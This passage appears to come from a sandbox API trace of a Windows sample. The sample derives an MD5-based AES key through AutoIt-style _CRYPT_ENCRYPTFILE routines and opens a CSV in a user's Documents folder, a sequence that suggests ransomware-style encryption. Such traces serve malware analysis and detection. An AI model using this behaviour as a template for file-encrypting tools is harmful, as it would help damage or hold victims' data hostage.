dwCmpFlags=0x1, lpString1="9Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bzzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zzuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zuy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uy Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Is9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIraE.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.669] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.669] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.669] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.669] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.669] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.669] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.669] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.669] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.669] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0x90af58 [0179.670] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.670] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.670] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.670] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.670] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.670] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.670] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.670] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.670] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.671] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.671] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.671] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.671] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0179.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.671] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.672] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.672] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.672] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.672] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.672] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.674] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.674] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.674] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.674] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.675] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.675] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.675] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.675] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.675] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.676] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.676] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.676] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.676] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.676] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.677] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0179.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.677] CryptDestroyHash (hHash=0x90ae18) returned 1 [0179.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\rdv9bzzuy is9hirae.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0179.682] 